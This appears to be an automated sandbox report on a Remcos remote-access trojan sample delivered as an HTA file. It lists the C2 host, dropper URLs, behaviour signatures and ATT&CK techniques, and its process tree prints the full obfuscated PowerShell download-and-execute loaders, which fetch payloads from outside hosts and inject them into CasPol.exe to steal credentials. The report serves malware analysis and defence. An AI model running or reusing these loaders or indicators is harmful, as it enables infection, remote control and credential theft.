remcos | af6c6b710e9a4c5e2d8b53642779548a4edcd528cd7e5714c6ac9d69f38efb80

Analysis

max time kernel
149s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
16-12-2024 06:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

clearentirethingwithbestnoticetheeverythinggooodfrome.hta
Size

144KB
MD5

5215d83b478d7a718062863c5efbbeeb
SHA1

9ac735295a8b3bc10740d50669f6fa5c81ae10ce
SHA256

af6c6b710e9a4c5e2d8b53642779548a4edcd528cd7e5714c6ac9d69f38efb80
SHA512

b1ea72019653fa7858aa1b6ad1fa3fcf6974ade703be0edd55f891030706fc675425e5f1372dc3a61671dff5e40e6baceba019af60711cd65a248f7cecbca915
SSDEEP

768:t1EZFxaTOum2oum2M5KUJDVUKhCbGVf/AMF9woN83WkkA7MhrkK0IHj66666666l:tg

Score

10^/10

remcos remotehost collection defense_evasion discovery execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20

exe.dropper

https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20

Extracted

Family

remcos

Botnet

RemoteHost

kelexrmcadmnnccupdated.duckdns.org:14646

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-B3IX49
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/4276-105-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/4376-107-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/4536-106-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/4536-106-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/4376-107-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 3 IoCs

flow	pid	Process
18	4964	powershell.exe
21	4656	powershell.exe
29	4656	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
4504	cmd.exe
4964	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	CasPol.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4656	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 4656 set thread context of 3184	4656	powershell.exe	98
PID 3184 set thread context of 4376	3184	CasPol.exe	101
PID 3184 set thread context of 4536	3184	CasPol.exe	102
PID 3184 set thread context of 4276	3184	CasPol.exe	105

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
4964	powershell.exe
4964	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4276	CasPol.exe
4276	CasPol.exe
4376	CasPol.exe
4376	CasPol.exe
4376	CasPol.exe
4376	CasPol.exe

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
3184	CasPol.exe
3184	CasPol.exe
3184	CasPol.exe
3184	CasPol.exe
3184	CasPol.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4964	powershell.exe
Token: SeDebugPrivilege	4656	powershell.exe
Token: SeDebugPrivilege	4276	CasPol.exe

Suspicious use of WriteProcessMemory 49 IoCs

description	pid	Process	procid_target
PID 864 wrote to memory of 4504	864	mshta.exe	82
PID 864 wrote to memory of 4504	864	mshta.exe	82
PID 864 wrote to memory of 4504	864	mshta.exe	82
PID 4504 wrote to memory of 4964	4504	cmd.exe	84
PID 4504 wrote to memory of 4964	4504	cmd.exe	84
PID 4504 wrote to memory of 4964	4504	cmd.exe	84
PID 4964 wrote to memory of 2328	4964	powershell.exe	85
PID 4964 wrote to memory of 2328	4964	powershell.exe	85
PID 4964 wrote to memory of 2328	4964	powershell.exe	85
PID 2328 wrote to memory of 2540	2328	csc.exe	86
PID 2328 wrote to memory of 2540	2328	csc.exe	86
PID 2328 wrote to memory of 2540	2328	csc.exe	86
PID 4964 wrote to memory of 3356	4964	powershell.exe	91
PID 4964 wrote to memory of 3356	4964	powershell.exe	91
PID 4964 wrote to memory of 3356	4964	powershell.exe	91
PID 3356 wrote to memory of 4656	3356	WScript.exe	92
PID 3356 wrote to memory of 4656	3356	WScript.exe	92
PID 3356 wrote to memory of 4656	3356	WScript.exe	92
PID 4656 wrote to memory of 3048	4656	powershell.exe	97
PID 4656 wrote to memory of 3048	4656	powershell.exe	97
PID 4656 wrote to memory of 3048	4656	powershell.exe	97
PID 4656 wrote to memory of 3184	4656	powershell.exe	98
PID 4656 wrote to memory of 3184	4656	powershell.exe	98
PID 4656 wrote to memory of 3184	4656	powershell.exe	98
PID 4656 wrote to memory of 3184	4656	powershell.exe	98
PID 4656 wrote to memory of 3184	4656	powershell.exe	98
PID 4656 wrote to memory of 3184	4656	powershell.exe	98
PID 4656 wrote to memory of 3184	4656	powershell.exe	98
PID 4656 wrote to memory of 3184	4656	powershell.exe	98
PID 4656 wrote to memory of 3184	4656	powershell.exe	98
PID 4656 wrote to memory of 3184	4656	powershell.exe	98
PID 3184 wrote to memory of 4376	3184	CasPol.exe	101
PID 3184 wrote to memory of 4376	3184	CasPol.exe	101
PID 3184 wrote to memory of 4376	3184	CasPol.exe	101
PID 3184 wrote to memory of 4376	3184	CasPol.exe	101
PID 3184 wrote to memory of 4536	3184	CasPol.exe	102
PID 3184 wrote to memory of 4536	3184	CasPol.exe	102
PID 3184 wrote to memory of 4536	3184	CasPol.exe	102
PID 3184 wrote to memory of 4536	3184	CasPol.exe	102
PID 3184 wrote to memory of 468	3184	CasPol.exe	103
PID 3184 wrote to memory of 468	3184	CasPol.exe	103
PID 3184 wrote to memory of 468	3184	CasPol.exe	103
PID 3184 wrote to memory of 2360	3184	CasPol.exe	104
PID 3184 wrote to memory of 2360	3184	CasPol.exe	104
PID 3184 wrote to memory of 2360	3184	CasPol.exe	104
PID 3184 wrote to memory of 4276	3184	CasPol.exe	105
PID 3184 wrote to memory of 4276	3184	CasPol.exe	105
PID 3184 wrote to memory of 4276	3184	CasPol.exe	105
PID 3184 wrote to memory of 4276	3184	CasPol.exe	105

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\clearentirethingwithbestnoticetheeverythinggooodfrome.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:864
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4504
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4964
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bau5wwkl\bau5wwkl.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2328
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC256.tmp" "c:\Users\Admin\AppData\Local\Temp\bau5wwkl\CSC77ED26B8EE0E48B997598A28A051B0F6.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2540
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3356
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = 'JG5vbmV2YWx1YXRpdmUgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskZXJ5dGhyb3N0b211bSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHBpZWhvbGVzID0gJGVyeXRocm9zdG9tdW0uRG93bmxvYWREYXRhKCRub25ldmFsdWF0aXZlKTskcGxhY29kZXJtYXRvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcGllaG9sZXMpOyRiYW5kYm94ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR5ZW1hbiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHByZWxhY3kgPSAkcGxhY29kZXJtYXRvdXMuSW5kZXhPZigkYmFuZGJveCk7JGZhbWVkID0gJHBsYWNvZGVybWF0b3VzLkluZGV4T2YoJHllbWFuKTskcHJlbGFjeSAtZ2UgMCAtYW5kICRmYW1lZCAtZ3QgJHByZWxhY3k7JHByZWxhY3kgKz0gJGJhbmRib3guTGVuZ3RoOyR3aXRlbmFnZW1vdCA9ICRmYW1lZCAtICRwcmVsYWN5OyRzb3Bob21hbmlhYyA9ICRwbGFjb2Rlcm1hdG91cy5TdWJzdHJpbmcoJHByZWxhY3ksICR3aXRlbmFnZW1vdCk7JGdyaWZmaW4gPSAtam9pbiAoJHNvcGhvbWFuaWFjLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb3Bob21hbmlhYy5MZW5ndGgpXTskYXV0b3Bsb2lkeSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGdyaWZmaW4pOyRsZWRlcml0ZSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGF1dG9wbG9pZHkpOyR1bmJpb3R1cmJhdGVkID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHVuYmlvdHVyYmF0ZWQuSW52b2tlKCRudWxsLCBAKCcwLzFEYkJwL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckYmFja3NjYXR0ZXJpbmdzJywgJyRiYWNrc2NhdHRlcmluZ3MnLCAnJGJhY2tzY2F0dGVyaW5ncycsICdDYXNQb2wnLCAnJGJhY2tzY2F0dGVyaW5ncycsICckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCcxJywnJGJhY2tzY2F0dGVyaW5ncycsJycpKTs=';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthine
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4656
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        
        PID:3048
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:3184
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\poycesmgpzlfzbynsfikrpmeakpxpdxd"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4376
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\aqlnf"
        7⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:4536
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\kkqfgvpb"
        7⤵
        
        PID:468
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\kkqfgvpb"
        7⤵
        
        PID:2360
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\kkqfgvpb"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4276

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
14773fe395bd85fb2501a5163108613a

SHA1
2f7a268edb60d7f7a3d686edaeafc4280bf5a7be

SHA256
db005d51d5688d553b3dd06d2a133b7c1b8834db14caae5a3f3f25e0a0b24d15

SHA512
02299c6c562c297f05018aa2b53c19b5de405bf1881bebf62b51144cf7e6fd60fc99f67fda723980ac9e87deaba7e89700440dcf9a8da73137bbad7efb9e4d63

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC256.tmp

Filesize
1KB

MD5
06cdbe2b387a20c9d88305602ecd7848

SHA1
d20bbc58fb7fc88204a7956b3be7ef433147f9e4

SHA256
810305fc687dafe55179bcedba219301e22466f02c8773d5f6a9a36c4e25ead9

SHA512
a8e164251f2db03b5eab82edaa6d24ae65c9f51e609f94cf5d1f0bb5c778df8b5912e1dc5aca1591439504ae9e41b289a97391ef89c1bdc6b9a559b6fc116057

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_us2j32j3.5oc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bau5wwkl\bau5wwkl.dll

Filesize
3KB

MD5
b2ee7849827e241f3678e9f75c485bec

SHA1
124a2cd9354a20009253e74261d515ec2fe48dcc

SHA256
c2bd12ed1aa663a44e4d4b49b37dafa859388815866ec94d7e6878ec55f6218b

SHA512
7109117609c81d5254b465f029d535c529ddf80af651992ccf1a4d63d171821dd5dc1320596db3700e3a6b3b4c909663c99c185beb44102e1360d0840d43fba6

Download Submit
C:\Users\Admin\AppData\Local\Temp\poycesmgpzlfzbynsfikrpmeakpxpdxd

Filesize
4KB

MD5
75379d3dcbcea6a69bc75b884816dd40

SHA1
7e073a03c3bdbbc60375ddbe56bba211c3d412a6

SHA256
cab559f3bbe4a0beb194dffca723b3072184b92687100462eaab04d66fff8de9

SHA512
710c2cee369a57a0039fc0d0c59de6118780210ef60ad0daf374f03ba94ab08039bc2aff821f7c99a0ecd0e16189c52e5b6d630b3d541f7b11375f134b985e8c

Download Submit
C:\Users\Admin\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS

Filesize
150KB

MD5
2e124153be958647e84566b305ecf94e

SHA1
d7d06fe6314ee8e4c31a971872632477ede38248

SHA256
5b5835cebcc79ae42d3edc11ddca5e2f6c4bf333e78d1b2d0733a091a9fd887e

SHA512
9bb7f048cfa817e406d63affc034ea89f7beb6dd584521d5b1a531a032e22470bb9e9c8a12931b5838a77267acf5fe64e8e788caee49c014348b75925614e450

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bau5wwkl\CSC77ED26B8EE0E48B997598A28A051B0F6.TMP

Filesize
652B

MD5
26d8778f6a77505920509b94abc8ce31

SHA1
35acbf2133cc2d4a34a2b6b9f516d5ecc7031093

SHA256
45e4db2b403a7bd59038eefaf5ed644a324d30f73ea319bb591d8b867774a9b4

SHA512
b8c761b7528d857cdecaa3990baa109b06174eccb61f9798f0472129735c3bb0faf954e4dba28a29305fe32bbfbde808d4a8510b3c7f5d6c8588e4b3fbda0665

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bau5wwkl\bau5wwkl.0.cs

Filesize
475B

MD5
0c431e10cf228fe2c475697b04ff0ebb

SHA1
04439e5d97e5c2e03f57caf24564925b32d644cb

SHA256
f0514c83d3a0460e90e267fbb96546f4b5890906eb7ea94799c38ec743fb91ae

SHA512
954a57476daa5408f0ff679972741e63e8fe61ff20bdefc40b83ad6ff633b0a7d5d3ddce7cfaff0a5ff0bc2300704f6c5639adbf44f38a818d22644814e5efcb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bau5wwkl\bau5wwkl.cmdline

Filesize
369B

MD5
5c1c961ec7e14164d8b13a14b6bc2825

SHA1
7d4f2a8fc11891617ee073fc9852a13b94382b89

SHA256
59e86b76bbbf29ca2f8be836a67651b59d525532e21efc05b093d07956b1a305

SHA512
f195333f13bd858bdc47d9a0d3d648f15974d989843abf699a4fd5d63082167850f7a2a08ac8e54a0173b38cc710b0b11639243ed80c5c70262648038efa9b45

Download Submit
memory/3184-116-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/3184-91-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/3184-117-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/3184-113-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/3184-118-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/3184-126-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/3184-125-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/3184-88-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/3184-124-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/3184-87-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/3184-90-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/3184-86-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/3184-92-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/3184-123-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/3184-98-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/3184-97-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/3184-96-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/3184-94-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/3184-93-0x0000000000400000-0x000000000047F000-memory.dmp

